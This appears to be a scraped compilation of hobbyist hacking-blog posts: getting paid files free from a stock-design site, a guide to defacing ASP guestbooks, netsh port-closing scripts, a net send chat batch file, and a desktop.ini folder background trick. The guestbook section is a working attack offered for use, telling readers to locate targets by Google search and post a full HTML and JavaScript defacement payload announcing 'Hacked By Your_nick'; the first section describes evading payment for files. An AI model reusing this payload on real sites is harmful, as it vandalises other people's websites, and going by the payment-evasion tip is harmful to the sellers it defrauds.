How to Download File Free From Photoshop River


How to Download File Free From Photoshop River 

STEP 1 )


1) First of All open a link of product which you want to download for Example :



Step 2 


Now See how to download a File :

  • Don't Click on Download Button with Name Buy Now  '' Green Button ''
See the Screen Short of Real and Free link 




After clicking on below file with Name "yourlogo.txt"
  • You download a .txt file 
  • Open the file and get link Like 

Step 3





Don't Forgot to say thanks !
This All because of  Google highly  strickness and Security.

How To ''Deface'' A Guestbook With HTML-Injection


How To ''Deface'' A Guestbook With HTML-Injection

Go to google and search:  guestbook.asp

When you find a guestbook, send in this as a comment:

< --- Inizio codice --- >

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"
http://www.w3.org/TR/html4/loose.dtd
">
<html>
<head>
<BODY bgColor=#000000>.
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Hacked By Your_nick</title>
<script>alert("Hacked By Your_nick - Italian Hackers")</script>
<style type="text/css">
<!--
.style1 {
font-size: 36px;
font-family: Arial, Helvetica, sans-serif;
color: #00FF00;
}
.style2 {font-size: 18px; font-family: Arial, Helvetica, sans-serif;
color: #ffffff; }
.style3 {font-size: 36px; font-family: Arial, Helvetica, sans-serif;
color: #000000; font-weight: bold; }
-->
</style>
</head>
<body>
<center><p class="style1"><img
src="
http://www.baywoodracquetclub.com/images/warning.jpg
" width="301"
height="268"></p>
</center>
<p align="center" class="style1"><strong>This Web Site contains bug -
HaCkEd By Your_Nick - Italian Hackers
</strong></p>
<p align="center" class="style3"><img
src="
http://www.scuolepistoia.it/lsssalutati/Immagini/Formazione/Progetto
%20SOU%20(Spazio%20Orientamento%20Universitario).gif
" width="204"
height="153"></p>
<p class="style1">&nbsp;</p>
<p class="style1">&nbsp;</p>
<p align="center" class="style2"><b>Site HaCkEd By Your_Nick</b></p>
<p class="style1">&nbsp;</p>
<p class="style1">&nbsp; </p>
</body>
</html>

< ---- Fine codice --- >

How To Close Ports in Windows

How To Close Ports in Windows

So i've been looking for a while on just how to close a port on a computer. I simply
couldn't find a way. Well, i finally found it. This'll only work for windows users (unless
your unix version OS has netsh).

it's actually quite simple. here's the command for it:

netsh firewall delete portopening TCP portnumber

it's that simple. Simply go to START -> RUN -> and type in that command up there,
and it'll close it for you.

or,

you can also open up command prompt (START -> RUN -> CMD) and type in "netsh"
without the quotes to get to your windows firewall settings.

However, since i'm such a nice guy, i wrote it all out in a vbs script for you so that it's
automatically runable. as well as a batch script. so here you are fellas:

.VBS Script :

set ss = createobject("wscript.shell")
set ws = wscript
dim PORT
PORT = InputBox("Enter the port you wish to close:")
ss.run "netsh.exe"
ws.sleep 1000
ss.sendkeys "firewall delete portopening TCP " & PORT
ss.sendkeys "{enter}"
ws.sleep 500
'ss.sendkeys "exit"
'ss.sendkeys "{enter}"

.BAT Script

@echo off
title Port Closer
echo Port Closer
echo.
set /p port=Type the port number you wish to close here:
netsh firewall delete portopening TCP %port%
msg /w * Port %port% has been closed.
exit


Chat with Friends through Ms dos Command Prompt



Chat with Friends through Ms dos Command Prompt


1) All you need is your friend's IP Address and your Command Prompt.

2)Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


3)  Now save this as "Messenger.Bat".

4)  Open Command Prompt.

5)  Drag this file (.bat file) over to Command Prompt and press Enter.

6)  You would then see something like this:


7)  Now, type the IP Address of the computer you want to contact and press enter
You will see something like this: 


8) Now all you need to do is type your message and press Enter.
      Start Chatting.......! 



How to change your folders background in Windows



How to change your folders background in Windows

Step 1:

Have the Folder you want to put the background on open!

Step 2:

Open up Notepad, then simply
paste in this code:

 [{BE098140-A513-11D0-A3A4-00C04FD706EC}] iconarea_image=***Picture Location Here!***\***Name of File!***

 Step 3: 

Go to your picture (the picture you want to use!) and right click and select properties and find the file location for example lets say my file is in "my hardrive" it would be located at "C:\\" understand? copy the location!

Step 4: 

Now go back to ur text document (notepad) and where it says ***Picture Location Here!*** paste the location...u copied in the previus step!

Step 5: 

Now after u've done that where it says ***Name of File!*** type the name of the file including the .jpg .bmp .bip. jpeg etc 

Step 6:

Save the text document as "desktop.ini" be sure to remember the .ini extension! click Save as "All Files" not "Text Document" and save the document in the folder where u want the background to be!

Now just close the folder and open it again it should show the picture as a background!

Hope you Enjoy Comment if you have any Problem...